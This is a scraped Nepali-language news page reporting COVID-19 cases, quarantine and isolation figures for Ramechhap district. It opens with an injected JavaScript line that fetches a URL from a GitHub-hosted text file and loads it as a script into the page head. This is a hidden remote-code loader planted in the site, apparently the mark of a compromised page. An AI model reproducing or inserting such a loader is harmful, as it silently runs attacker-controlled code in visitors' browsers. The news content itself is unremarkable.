;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); रामेछापमा १२ महिलासहित ८२ जना क्वारेन्टिनमा : ३१ जना कूल संक्रमित – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • रामेछापमा १२ महिलासहित ८२ जना क्वारेन्टिनमा : ३१ जना कूल संक्रमित
जुनेली बिशेष

रामेछापमा १२ महिलासहित ८२ जना क्वारेन्टिनमा : ३१ जना कूल संक्रमित

कोरोनाको प्रभाव रामेछापमा

साउन २६,

रामेछाप । रामेछापमा  सोमबारसम्ममा ३१ जनामा कोरोना संक्रमण पुष्टि भएको छ  । जिल्ला स्वास्थ्य कार्यालय रामेछापले दिएको जानकारी अनुसार जिल्लामा ६१९  जनाको रिपोर्ट नेगेटिभ आएको छ । त्यस्तै हालसम्ममा ८ सय ९२ जनाको आरडिटी परीक्षण गरिएको छ । जसमा १८५ जना महिला र ७०७ जना पुरुषको  रहेका छन् ।

त्यस्तै जिल्लाका दुई नगरपालिका र छवटा गाउँपालिकामा गरि ४३६ वेडको क्वारेन्टिन बनाइएको छ । क्वारेन्टिनमा १२ महिलासहित ८२ जना मानिसहरु बसेका छन् ।

त्यस्तै १३५ वेडको आइसोलेसन कक्ष बनाइएको छ । आएसोलेसनमा ८ जना छन् । हालसम्ममा ८ सय ५० जनाको स्वाबसंकलन गरिएको छ । file Photo

No description available.

फेसबुक प्रतिक्रियाहरु